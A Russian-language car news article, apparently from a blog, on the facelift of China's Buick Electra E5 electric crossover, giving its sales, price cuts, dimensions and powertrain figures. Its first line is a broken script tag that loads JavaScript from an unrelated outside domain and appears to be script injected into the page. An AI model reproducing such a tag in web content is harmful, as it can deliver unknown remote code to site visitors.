script type="text/javascript" src="https://cdnwidget.simplejsmenu.com/public/lib.en.min.js">

Китайский Buick Electra E5 пережил рестайлинг на фоне слабых продаж

В электронной базе китайского Минпрома появились фотографии обновлённого среднеразмерного электрического кроссовера Buick Electra E5, он получил более лаконичное оформление передка и сохранил прежнюю техническую начинку.

Кроссовер Electra E5 вышел на китайский рынок два года назад как первый электромобиль нового поколения марки Buick, в его основе лежит модульная платформа GM BEV3, в прошлом известная как Ultium. Хитом на китайском рынке Buick Electra E5 не стал, его продажи в прошлом году снижались, как и у многих других моделей совместного предприятия SAIC-GM, которое сейчас переживает кризис и находится в ожидании реструктуризации.

Любопытно, что в этом году спрос на Buick Electra E5 пошёл вверх, в январе-феврале, по данным CAAM (Китайская ассоциация автопроизводителей), продано 4800 шт. (+20,7% по сравнению с АППГ), но этот всплеск объясняется большими скидками: если прежде минимальная цена кроссовера составляла 208 900 юаней (2,39 млн рублей в переводе по текущему курсу), то теперь — 169 900 юаней (1,94 млн рублей). В целом продажи марки Buick в Китае за первые два месяца текущего года сократились на 8,5% до 58 513 автомобилей.

Китайский Buick Electra E5 пережил рестайлинг на фоне слабых продаж

Обновлённый Buick Electra E5

Подготовленное обновление Buick Electra E5 носит по большей части формальный характер: кроссоверу изменили оформление передка, чтобы он лучше соответствовал актуальной китайской моде. На смену фальшивой решётке, обрамлённой по бокам хромированными клыками, пришла «залысина», а под ней разместился новый воздухозаборник с выпяченной «губой» в нижней части. Из ключевых размеров изменилась только высота: была — 1654 мм, стала 1681-1683 мм в зависимости от модификации. Остальные размеры прежние: габаритная длина — 4892 мм, ширина — 1905 мм, колёсная база — 2954 мм. Дизайн кормы не изменился.

Китайский Buick Electra E5 пережил рестайлинг на фоне слабых продаж

Обновлённый Buick Electra E5

На данный момент для обновлённого Buick Electra E5 заявлен только один электромотор на передней оси, его максимальная отдача — 180 кВт (245 л.с.) и 330 Нм. Других технических подробностей пока нет. На дорестайлинговом кроссовере этот мотор сочетается с батареей ёмкостью 65 либо 68,4 кВт·ч, запас хода на одной зарядке — 515 и 545 км по циклу CLTC соответственно.

Китайский Buick Electra E5 пережил рестайлинг на фоне слабых продаж

Дорестайлинговый Buick Electra E5

Китайский Buick Electra E5 пережил рестайлинг на фоне слабых продаж

Дорестайлинговый Buick Electra E5

Китайский Buick Electra E5 пережил рестайлинг на фоне слабых продаж

Дорестайлинговый Buick Electra E5

Также у дорестайлингового Buick Electra E5 есть дальнобойная одномоторная версия Long Range: пиковая мощность электромотора здесь снижена до 150 кВт (204 л.с.), максимальный крутящий момент — 330 Нм, ёмкостью батареи — 79,7 кВт·ч, запас хода на одной заряде — 620 км. Топовая двухмоторная версия дорестайлингового Buick Electra E5 предлагается в сочетании с батареей на 79,7 кВт·ч, передний электромотор здесь выдаёт 143 кВт (194,5 л.с.) и 305 Нм, задний — 68 кВт (92,5 л.с.) и 160 Нм, запас хода на одной зарядке — 603 км.

Дата премьеры обновлённого Buick Electra E5 пока не объявлена, но, полагаем, на китайский рынок Electra E5 с изменившимся лицом выйдет в ближайшие месяцы. Поставлять этот кроссовер на американский рынок корпорация GM так и не решилась.

От admin

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *